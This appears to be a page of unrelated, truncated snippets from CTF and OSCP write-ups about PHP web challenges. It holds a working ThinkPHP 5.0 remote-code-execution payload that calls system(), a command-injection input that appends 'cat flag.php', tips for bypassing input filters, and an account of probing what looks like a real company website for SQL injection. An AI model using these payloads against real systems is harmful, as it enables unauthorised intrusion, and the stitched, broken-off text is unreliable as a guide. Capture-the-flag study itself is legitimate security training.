This was a fun one that taught me about PHP assert(). Assertion101 Walkthrough OSCP Bootcamp March 10th 2023 Topics: Earlier this week was the first day of the OSCP bootcamp I started at Evolve Security. So far, so good. Our lead instructor has a ton of real world experience and I ...
public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source.""; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)...
Run a binary as a different architecture 64 bit: linux64 ./<binary> 32 bit: linux32 ./<binary> Extract MS Macros: https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php View CNC GCode https://ncviewer.com/ About...
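BUGKU CTF WEB basics: $_POST. Compare with the previous challenge. The difference between passing values with POST and GET in PHP. According to the challenge, we only need to send the parameter what=flag using POST. Install the HackBar extension in Firefox and you get the flag. CTF Learning (Beginner): Bugku--web--web2 CTF Learning (Beginner): Bugku--web--web2 Challenge link: http://123.206.87.240:8002/web2 Operations involved: view the page source...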
with an opportune accidental discovery of a PHP zero-day vulnerability that the CTF designer or anybody in the community knew nothing about. PHP powers many modern websites, including popular web platforms like WordPress and Drupal. While the team that maintains PHP is diligent, quickly patching newly...
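First up is SQL injection. This is a simple integer-type injection challenge. First, go to the URL: http://www.kabelindo.co.id/index.php At first I thought it was injection through the search box, and then I found out I was wrong... But I saw news: This was very nice. After going in, there was indeed an injection point: adding a single quote produces an error. Adding and1=1 does not produce an error. This shows it is an intelligent...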
Opening the container, you can tell it is ThinkPHP version 5.0; search online for the RCE and go straight at it. poc ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami Modify the poc and the flag is visible directly. payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=env Casual injection ...
<?php $row; $pass=$_POST['pw']; if($row['username']=='admin'){ if($row['password']==md5($pass)){ echo $flag; }else{ echo "wrong pass!"; } }else{ echo "wrong user!"; }
The Zerion challenge was an encoded PHP file; the script provided the steps to decode the string via the following function: base64_decode(strrev(str_rot13($L66Rgr[1]))) To get the flag you needed to: ROT 13 “decrypt” the encoded string, ...
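Then, since flag.php is in the same directory, we can just cat it. If there were no filtering, we would enter 127.0.0.1;cat flag.php. But after trying our input, we found that this challenge filters spaces and 'flag', so we have to find a way to bypass the filtering of spaces and 'flag'. Let's first bypass the space filter; before that, let's go over 0x03...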